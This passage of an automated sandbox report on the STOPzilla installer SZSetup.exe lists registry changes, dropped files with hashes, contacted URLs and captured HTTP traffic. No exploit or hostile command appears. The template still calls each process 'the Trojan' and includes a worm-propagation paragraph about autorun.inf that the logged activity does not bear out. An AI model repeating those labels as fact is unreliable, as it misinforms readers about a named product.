"(Default)" = "{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}"

[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}\NumMethods]
"(Default)" = "7"

[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"

[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"

[HKCR\GFI.SBOEPlugIn.1]
"(Default)" = "SBOEPlugIn Class"

[HKCR\TypeLib\{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}\1.0\0\win64]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"

[HKCR\AppID\SBOutlookExpress.DLL]
"AppID" = "{AC7CD0E2-273C-4EAC-B873-904CE5E01472}"

[HKCR\SBAMOutlook.SBOutlookPlugIn.1\CLSID]
"(Default)" = "{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}"

[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\TypeLib]
"Version" = "1.0"

[HKCR\GFI.SBWLMailPlugIn]
"(Default)" = "SBWLMailPlugIn Class"

[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\VersionIndependentProgID]
"(Default)" = "SBAMOutlook.SBOutlookPlugIn"

[HKCR\CLSID\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\InProcServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"

[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"

[HKCR\CLSID\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\TypeLib]
"(Default)" = "{F3C81931-7FBC-4E52-8BDE-20CB46534CB3}"

[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\InprocServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"

[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}\VersionIndependentProgID]
"(Default)" = "GFI.SBWLMailPlugIn"

[HKLM\SOFTWARE\Nektra\WLMAILAPI\Plugins]
"GFI" = "GFI.SBWLMailPlugIn"

[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}]
"(Default)" = "SBOEPlugIn Class"

[HKCR\GFI.SBOEPlugIn\CurVer]
"(Default)" = "GFI.SBOEPlugIn.1"

[HKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\SBAMOutlook.SBOutlookPlugIn.1]
"LoadBehavior" = "3"

[HKCR\CLSID\{A0695DC8-366E-4FEE-AC3C-A442E4E29C4E}]
"(Default)" = "SBWLMailPlugIn Class"

[HKCR\Interface\{F0558B4E-7949-4EC4-8DB8-F8E79D1C07AE}]
"(Default)" = "ISBWLMailPlugIn"

[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}]
"AppID" = "{AC7CD0E2-273C-4EAC-B873-904CE5E01472}"

[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Office\Outlook\Addins\SBAMOutlook.SBOutlookPlugIn.1]
"FriendlyName" = "VIPRE Outlook AntiVirus Object"

[HKCR\GFI.SBWLMailPlugIn.1]
"(Default)" = "SBWLMailPlugIn Class"

[HKCR\GFI.SBWLMailPlugIn\CurVer]
"(Default)" = "GFI.SBWLMailPlugIn.1"

[HKCR\Interface\{E868ABBE-1502-4D7A-BDC2-E6BCDE75959B}\NumMethods]
"(Default)" = "7"

[HKCR\Interface\{9F8D3F3F-29DF-40C3-B09B-547A1E5C22E2}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}]
"(Default)" = "SBOutlookPlugIn Class"

[HKCR\CLSID\{E58A2D62-2CF0-4FD3-9C87-74966157CDDB}\InprocServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{926195BB-EF79-4201-A585-57E8CA8B9260}\InprocServer32]
"(Default)" = "%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll"

The process SZNetAssistant.exe:3916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\27AC9369FAF25207BB2627CEFACCBE4EF9C319B8]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 27 AC 93 69"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 80 3A BC 22"

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E]
"LanguageList" = "en-US, en"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"47BEABC922EAE80E78783462A79F45C254FDE68B"

[HKU\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates]
"27AC9369FAF25207BB2627CEFACCBE4EF9C319B8"

The process mobsync.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\SyncMgr\HandlerInstances\{750FDF10-2A26-11D1-A3EA-080036587F03}]
"SyncTime" = "00 00 00 00 00 00 00 00"
"Connected" = "1"

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\SyncMgr]
"StartAtLogin" = "0"

[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\SyncMgr\HandlerInstances\{750FDF10-2A26-11D1-A3EA-080036587F03}]
"Enabled" = "1"

The process SZServer.exe:3384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\5A1C102CCFDFDB5468E601489DB25A5E\Usage]
"STOPzilla_Files" = "1184432147"

The process MsiExec.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\HELPDIR]
"(Default)" = ""

[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\0\win32]
"(Default)" = "C:\Windows\SysWOW64\msxml4.dll"

[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0]
"(Default)" = "Microsoft XML, v4.0"

The Trojan deletes the following registry key(s):

[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\0\win32]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\HELPDIR]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\FLAGS]
[HKCR\TypeLib\{F5078F18-C551-11D3-89B9-0000F81FE221}\4.0\0]

Dropped PE files

MD5 File path
b161d2688806d6b7a93a79e325be8066 c:\Program Files (x86)\STOPzilla\Definitions\IncompatiblePrograms.dll
3f20b1f14617ebe8cf3c7316b62c71e5 c:\Program Files (x86)\STOPzilla\Definitions\gfiark.dll
fe4d369172ac1cc19c876bdb5bdc31a3 c:\Program Files (x86)\STOPzilla\Definitions\gfiark32.sys
4ea5458fca8518344686c543749365b1 c:\Program Files (x86)\STOPzilla\Definitions\gfiark64.sys
7604c69f910e7087d6323b6fc1c8c482 c:\Program Files (x86)\STOPzilla\Definitions\gfiarkup.dll
d5034f1c940065cbe9febbde733a3e36 c:\Program Files (x86)\STOPzilla\Definitions\gfiutil.dll
3eaeb9143a5dbc1082785bbbe8d8cfea c:\Program Files (x86)\STOPzilla\Definitions\gfiutl32.sys
16a23ff8621929adc5b18dccd5e206ee c:\Program Files (x86)\STOPzilla\Definitions\gfiutl64.sys
5960bad9ff184dcd8f032c7d909cee7e c:\Program Files (x86)\STOPzilla\Definitions\kbu.dll
218b5eda2be90c6de35896779a451e63 c:\Program Files (x86)\STOPzilla\Definitions\lgpl.dll
00e66576a6546fdbcd8d69fa9a341c90 c:\Program Files (x86)\STOPzilla\Definitions\lib7zip.dll
98dbc4ee648e95b2da496d530645bca2 c:\Program Files (x86)\STOPzilla\Definitions\libBase64.dll
ed02af97b3b634366ab3a95d01db0e2e c:\Program Files (x86)\STOPzilla\Definitions\libCHM.dll
99668910cee4edc6b4b0f85c509b8f53 c:\Program Files (x86)\STOPzilla\Definitions\libEmail.dll
ad9b286c561f8003d7c72ac5619c3b4e c:\Program Files (x86)\STOPzilla\Definitions\libMachoUniv.dll
71ac4c5a866dd478b2738bed4db9de90 c:\Program Files (x86)\STOPzilla\Definitions\libMsCab.dll
02ab09d06f7ce435debac7ef8acf19ae c:\Program Files (x86)\STOPzilla\Definitions\libMsi.dll
396dfe4a9cd641e7434f33506ece790b c:\Program Files (x86)\STOPzilla\Definitions\libNSIS.dll
c7566f4c1047997d86883a28d3ed02a7 c:\Program Files (x86)\STOPzilla\Definitions\libOleA.dll
e44a1d3a2204080d64cacd126206b9ba c:\Program Files (x86)\STOPzilla\Definitions\libRTF.dll
4585f5837ab43866580cf92c4cf4ed62 c:\Program Files (x86)\STOPzilla\Definitions\libRar.dll
9200387ed2757b65872be3d44dd3bbd8 c:\Program Files (x86)\STOPzilla\Definitions\libVvs.dll
d7a8e954cbff33e2c22d2c97d05f0112 c:\Program Files (x86)\STOPzilla\Definitions\libZip.dll
e69e80320e3dd4a95e0bcac115a1737c c:\Program Files (x86)\STOPzilla\Definitions\libtd.dll
7b293f4b7fba99a8fe190e8263abda17 c:\Program Files (x86)\STOPzilla\Definitions\patchw32.dll
592133b8c71bf389fb02ae0d983f1b15 c:\Program Files (x86)\STOPzilla\Definitions\remediation.dll
81544235fa6fbe909aa45480ceb4b28e c:\Program Files (x86)\STOPzilla\Definitions\updater.dll
58cd98421f7cc9b85764f8d55ef421cf c:\Program Files (x86)\STOPzilla\Definitions\vcore.dll
7b7505f8674ac9c8418b55f807a06f1d c:\Program Files (x86)\STOPzilla\Drivers\amd64\sbapifs.sys
c2d6ea33266fcd9a08003b91e24344c9 c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\SBTIS.sys
97ecce37dbaa0a871b4504cef53ee76b c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\SBWTIS.sys
1b1ae5f447175d4b0b32b959b1adb287 c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\sbfw.sys
4a5f19b271f147d93a596a920db267d2 c:\Program Files (x86)\STOPzilla\Drivers\amd64\wlh\sbhips.sys
f1a634ec4c67ae3a73a45e8889a50a7b c:\Program Files (x86)\STOPzilla\Drivers\amd64\wnet\SBTIS.sys
9aef0f267553fd9c900e9449b61586b7 c:\Program Files (x86)\STOPzilla\Drivers\amd64\wnet\SbFwIm.sys
562b2169b40a26c261fe8825ec7bafe0 c:\Program Files (x86)\STOPzilla\Drivers\amd64\wnet\sbfw.sys
22b224ab09f7756ee84219be38a4a6d5 c:\Program Files (x86)\STOPzilla\Drivers\i386\sbaphd.sys
56a449846631a90acd4c585adcdaf30f c:\Program Files (x86)\STOPzilla\Drivers\i386\sbapifs.sys
f581f124ca70b2e1272cfd16a46a3332 c:\Program Files (x86)\STOPzilla\Drivers\i386\sbapifsl.sys
e6b0078dd3243517d287ad603d9d530f c:\Program Files (x86)\STOPzilla\Drivers\i386\w2k\SBTIS.sys
9b60012f6212d87ad4c3a87f66fd5608 c:\Program Files (x86)\STOPzilla\Drivers\i386\w2k\SbFwIm.sys
e3a663da49929a172c4a70deeb63f364 c:\Program Files (x86)\STOPzilla\Drivers\i386\w2k\sbfw.sys
23e0af9ad52a479e6a03a2f37c0d3251 c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\SBTIS.sys
804ea0e614b340bdd40c8ef4662698bf c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\SBWTIS.sys
d43f30ac7ba8f5c42bd80640d9369fcf c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\sbfw.sys
da12cd4cc9f5894c1627d4f5f6eb23c2 c:\Program Files (x86)\STOPzilla\Drivers\i386\wlh\sbhips.sys
1b4acddfe18b30c51f624734b1d98f3a c:\Program Files (x86)\STOPzilla\Drivers\i386\wxp\SbFwIm.sys
25d11986a7553b2419f841b45a4ec812 c:\Program Files (x86)\STOPzilla\GFI.Tools.Run64.exe
9639e9f51b79467aceead299a10aaeb2 c:\Program Files (x86)\STOPzilla\IncompatiblePrograms.dll
1c5a13ce6a6aef0002eee3be451e36df c:\Program Files (x86)\STOPzilla\SBAMOutlook.dll
d15b5914ef9bdfdf8258d49a28fab665 c:\Program Files (x86)\STOPzilla\SBAMSvc.exe
93ca0d75c20b8573168fe66f2ff1471f c:\Program Files (x86)\STOPzilla\SBAMSvcPS.dll
cb80af4b93622279bc19e84e98f92d1a c:\Program Files (x86)\STOPzilla\SBArva.dll
372746a478f9418e05dcc9da4a6aa6e5 c:\Program Files (x86)\STOPzilla\SBCA.dll
e6b695bc8bfdae023fc456550fa818f3 c:\Program Files (x86)\STOPzilla\SBRC.exe
5e18c431d340e8635578ac6c1ee4e56a c:\Program Files (x86)\STOPzilla\SBSetupDrivers.exe
b5e8fcea8b777a272dcdf2a5eef951ea c:\Program Files (x86)\STOPzilla\SBTE.dll
8e997e071e69f84b4f4a5593b6105ae8 c:\Program Files (x86)\STOPzilla\SBTIS.dll
6bf9fa1f744484cb75875cbb1ed9e0cf c:\Program Files (x86)\STOPzilla\STOPzilla.exe
4120a8388a98f15ea4e924d5723755cb c:\Program Files (x86)\STOPzilla\SZFileAssistant.exe
976e0317dde869d6b9df27d35ae85580 c:\Program Files (x86)\STOPzilla\SZNetAssistant.exe
3855f9938aa8efeb260aa7ea7dfedf1a c:\Program Files (x86)\STOPzilla\SZServer.exe
6f83bdd5d8037dbc4822c8dc52f92c34 c:\Program Files (x86)\STOPzilla\SZWSC.exe
d1a1adc701fe30c14865ed1175566d49 c:\Program Files (x86)\STOPzilla\SbFwe.dll
86a9b72debf646ee577acc3f92267155 c:\Program Files (x86)\STOPzilla\SbHips.dll
0f7951b5e9059986f8d86d3bd051255a c:\Program Files (x86)\STOPzilla\SbWebFilter.dll
441fb58a8d6dab39e7ce05e501d81163 c:\Program Files (x86)\STOPzilla\SpursDownload.dll
3f20b1f14617ebe8cf3c7316b62c71e5 c:\Program Files (x86)\STOPzilla\gfiark.dll
fe4d369172ac1cc19c876bdb5bdc31a3 c:\Program Files (x86)\STOPzilla\gfiark32.sys
4ea5458fca8518344686c543749365b1 c:\Program Files (x86)\STOPzilla\gfiark64.sys
93b9a6f54844e1da1806f56f3f054ac7 c:\Program Files (x86)\STOPzilla\gfiarksh.dll
d5034f1c940065cbe9febbde733a3e36 c:\Program Files (x86)\STOPzilla\gfiutil.dll
3eaeb9143a5dbc1082785bbbe8d8cfea c:\Program Files (x86)\STOPzilla\gfiutl32.sys
16a23ff8621929adc5b18dccd5e206ee c:\Program Files (x86)\STOPzilla\gfiutl64.sys
5960bad9ff184dcd8f032c7d909cee7e c:\Program Files (x86)\STOPzilla\kbu.dll
9ce7bd04edf43a81685030ff09e7f4d7 c:\Program Files (x86)\STOPzilla\mimepp.dll
0dc41cc978fd05152390174b95851e3e c:\Program Files (x86)\STOPzilla\oeapiinitcom.dll
2a769418ed33aa3e702c7327a6699e17 c:\Program Files (x86)\STOPzilla\oecom.dll
5fa9b930e89b8cbbb51c4daacc002207 c:\Program Files (x86)\STOPzilla\oehook.dll
7a4d7e803857225e1b6bbccfce3e3d23 c:\Program Files (x86)\STOPzilla\oestore.dll
55ff4d566ab4561d2fbc3d9bf4fb0c26 c:\Program Files (x86)\STOPzilla\sbap.dll
a5fe51b8ce661a935a165803c65a4bf1 c:\Program Files (x86)\STOPzilla\unrar.dll
c610485022bdaf12f3836b6955470b69 c:\Program Files (x86)\STOPzilla\vipre.dll
a8686b335519e7cc14dfeeebb0cb3d9c c:\Program Files (x86)\STOPzilla\x32\sbbd.exe
2b27f39cd22a9bad7b6e433d0233b68e c:\Program Files (x86)\STOPzilla\x64\SBAMOutlook.dll
a6767bed03486826014fb47875bbed6c c:\Program Files (x86)\STOPzilla\x64\SBAMSvcPS.dll
b97ad2bcd333f82776d7ff1ead919ce2 c:\Program Files (x86)\STOPzilla\x64\sbbd.exe
44d101190beacc0bacc8af12ee16c7fe c:\Windows\Installer\{C201C1A5-FDFC-45BD-866E-1084D92BA5E5}\ARPPRODUCTICON.exe
44d101190beacc0bacc8af12ee16c7fe c:\Windows\Installer\{C201C1A5-FDFC-45BD-866E-1084D92BA5E5}\NewShortcut1_E1495BBB3B6443E69DBFB09B3D0691D2.exe
966cdbb7fec5242b2552d55fcd2a3c12 c:\Windows\Installer\{C201C1A5-FDFC-45BD-866E-1084D92BA5E5}\UninstallSTOPzilla_14DDE1424B2549418BFF0B4BDBBB0762.exe
df9a5545501a2442ca54c73c6f4de827 c:\Windows\SysWOW64\mfc120.dll
f4f2a4c459dd3aa22dd3984d13b15746 c:\Windows\SysWOW64\mfc120u.dll
832cc047743469082fae5e3cc830cd8c c:\Windows\SysWOW64\mfcm120.dll
ab8766067bb26d7ab4061b0e4fc7d2c0 c:\Windows\SysWOW64\mfcm120u.dll
fd5cabbe52272bd76007b68186ebaf00 c:\Windows\SysWOW64\msvcp120.dll
034ccadc1c073e4216e9466b720f9849 c:\Windows\SysWOW64\msvcr120.dll
44e45bd9327abc0540593e809b32f3ca c:\Windows\SysWOW64\msxml4.dll
cf34eec288a4c53e71602d5e0d65ef89 c:\Windows\SysWOW64\msxml4r.dll
b97ad2bcd333f82776d7ff1ead919ce2 c:\Windows\SysWOW64\sbbd.exe
69837e50c50561a083a72a5f8ea1f6a2 c:\Windows\SysWOW64\vccorlib120.dll
9aef0f267553fd9c900e9449b61586b7 c:\Windows\System32\DriverStore\FileRepository\sbfwim.inf_amd64_neutral_09abe461a7fb864d\amd64\wnet\SBFWIM.sys
df9a5545501a2442ca54c73c6f4de827 c:\Windows\System32\mfc120.dll
f4f2a4c459dd3aa22dd3984d13b15746 c:\Windows\System32\mfc120u.dll
832cc047743469082fae5e3cc830cd8c c:\Windows\System32\mfcm120.dll
ab8766067bb26d7ab4061b0e4fc7d2c0 c:\Windows\System32\mfcm120u.dll
fd5cabbe52272bd76007b68186ebaf00 c:\Windows\System32\msvcp120.dll
034ccadc1c073e4216e9466b720f9849 c:\Windows\System32\msvcr120.dll
44e45bd9327abc0540593e809b32f3ca c:\Windows\System32\msxml4.dll
cf34eec288a4c53e71602d5e0d65ef89 c:\Windows\System32\msxml4r.dll
b97ad2bcd333f82776d7ff1ead919ce2 c:\Windows\System32\sbbd.exe
69837e50c50561a083a72a5f8ea1f6a2 c:\Windows\System32\vccorlib120.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name: iS3, Inc.
Product Name: STOPzilla
Product Version: 1.0.0.1
Legal Copyright: Copyright (C) 2015
Legal Trademarks:
Original Filename: SZSetup.exe
Internal Name: SZSetup.exe
File Version: 1.0.0.1
File Description: SZSetup
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 444320 444416 4.63553 01fe5975a96463c68a9730b939f9c82e
.rdata 450560 128084 128512 2.99724 3ed91c6d79cd15da81a5129faeb566cd
.data 581632 26316 12800 3.20506 18ad26b6e346363516b81415c2eedf3e
.rsrc 610304 1419844 1420288 5.24637 7e184cea4470ac1a14b855d48139c2d0
.reloc 2031616 27584 27648 4.54562 d2edca433123a76dca5a79625fbfa3ae

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://gdcrl.godaddy.com.akadns.net/repository/gdig2.crt
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab?19442460aa19440e
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?a208639af14885de
hxxp://download.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/manifest.xml 40.131.214.65
hxxp://d3ac8f3lk2h244.cloudfront.net/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi
hxxp://a1621.g.akamai.net/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?654c6292470e300a
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c=
hxxp://e8218.ce.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEDNHuJ72IX1vtHJpLeSTGzQ=
hxxp://a1621.g.akamai.net/pki/crl/products/microsoftrootcert.crl
hxxp://a1621.g.akamai.net/pki/crl/products/WinPCA.crl
hxxp://a1621.g.akamai.net/pki/crl/products/MicrosoftTimeStampPCA.crl
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= 23.43.139.27
hxxp://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl 87.245.221.107
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?19442460aa19440e 87.245.221.97
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?a208639af14885de 87.245.221.97
hxxp://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?654c6292470e300a 87.245.221.97
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEDNHuJ72IX1vtHJpLeSTGzQ= 23.43.139.27
hxxp://downloads.stopzilla.com/binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi 54.192.46.166
hxxp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl 87.245.221.107
hxxp://crl.microsoft.com/pki/crl/products/WinPCA.crl 87.245.221.107
hxxp://certificates.godaddy.com/repository/gdig2.crt 50.63.243.228
home.is3.com 40.131.214.67


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

SURICATA UDPv4 invalid checksum
SURICATA IPv4 invalid checksum

Traffic

GET /binaries/stopzilla/auto_installer/7.0.1.3/STOPzilla7.msi HTTP/1.1
Connection: Keep-Alive
Content-Type: text/plain
User-Agent: SZHttp/1.0
Host: downloads.stopzilla.com


HTTP/1.1 200 OK
Content-Type: binary/octet-stream
Content-Length: 23516160
Connection: keep-alive
Date: Tue, 07 Apr 2015 16:59:38 GMT
Cache-Control: max-age=3600
Last-Modified: Tue, 07 Apr 2015 15:38:43 GMT
ETag: "0c997fa32c992c652ebd769fca552fbf"
Accept-Ranges: bytes
Server: AmazonS3
Age: 3589
X-Cache: Hit from cloudfront
Via: 1.1 e506c7e675965afaac0dc7f9ab49be60.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fOmEzwFxgAUsh_fboTv_87DqGKtSCZw6OezYV8jQcPTzGFb6Xv4tRg==
........................>...................g...............8......
..6..........................r...s...t...u...v...w...M...N...O...P...Q
...R...@...A...B......................................................
......................................................................
............................................................ ... ...!.
..!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...
*...*... ... ...,...,...-...-.........../.../...0...0...1...1...2...2.
..3...3...4...4...5...5..........;....................................
......................................................................
......... ...!..."...#...$...%...&...'...(...)...*... ...,...-......./
...0...1...2...3...4...5...6...7...>...M...:...<.......=.......?
...@...A...B...C...D...E...F...G...H...I...J...L.......N.......O...P..
.Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b
...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s..
.t...u...v...w...x...y...z...{...|...}...~...........R.o.o.t. .E.n.t.r
.y....................................................................
........F.............UEl.p..9.............S.u.m.m.a.r.y.I.n.f.o.r.m.a
.t.i.o.n...........................(..................................
.....................<.......@H.?.C.A.E.D1H........................
......................................................................
....................@H.?dA/B6H........................................
..................................................................
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?19442460aa19440e HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT
If-None-Match: "80b4d90ca4fd01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT
ETag: "80b4d90ca4fd01:0"
Cache-Control: max-age=604800
Date: Sat, 25 Apr 2015 01:15:56 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Las
t-Modified: Tue, 24 Feb 2015 00:37:01 GMT..ETag: "80b4d90ca4fd01:0"..C
ache-Control: max-age=604800..Date: Sat, 25 Apr 2015 01:15:56 GMT..Con
nection: keep-alive......


GET /msdownload/update/v3/static/trustedr/en/47BEABC922EAE80E78783462A79F45C254FDE68B.crt?a208639af14885de HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Content-Length: 969
Date: Sat, 25 Apr 2015 01:15:57 GMT
Connection: keep-alive
0...0...........0...*.H........0..1.0...U....US1.0...U....Arizona1.0..
.U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root C
ertificate Authority - G20...090901000000Z..371231235959Z0..1.0...U...
.US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.
110/..U...(Go Daddy Root Certificate Authority - G20.."0...*.H........
.....0.........qb...Y4.......IX.".... C.;....I.'....N...p..2...>.N.
..O/Y0"...Vk......u.9Q{..5.tN......?........j..............;F|2...f"..
im6.......`.8......F...>.]|.|.. S..biQ%.a.D..,.C.#..:...)....]....0
.9.....K].2..bC%4.V'...;p*?n.....}....Sm`..,.X.._F.....<..I1\iF..G.
.....B0@0...U.......0....0...U...........0...U......:....g(.....An ...
..0...*.H...............]y...Yg.a.~;.1u-. .Oe......../..Z..t.s.8B..{..
u...........S.~.F..... ....'....Z.7....l....=.$Oy.5._.......-.......s@
.r%......h..W...:...D...7...2..8..d.,~........h..".8-z..T.i._3.z={....
_9..u..v.3.,./L.....O...JT...}......~...^....C..M..k...e.z...D.\....HT
TP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified
: Fri, 20 Feb 2015 20:14:50 GMT..Accept-Ranges: bytes..ETag: "05934e14
94dd01:0"..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..X-Powered
-By: ARR/2.5..X-Powered-By: ASP.NET..Content-Length: 969..Date: Sat, 2
5 Apr 2015 01:15:57 GMT..Connection: keep-alive..0...0...........0...*
.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0..
.U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority 
- G20...090901000000Z..371231235959Z0..1.0...U....US1.0...U....Ari
<<< skipped >>>


GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1762
content-transfer-encoding: binary
Cache-Control: max-age=581366, public, no-transform, must-revalidate
Last-Modified: Fri, 24 Apr 2015 18:45:16 GMT
Expires: Fri, 1 May 2015 18:45:16 GMT
Date: Sat, 25 Apr 2015 01:16:04 GMT
Connection: keep-alive
0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..2015042
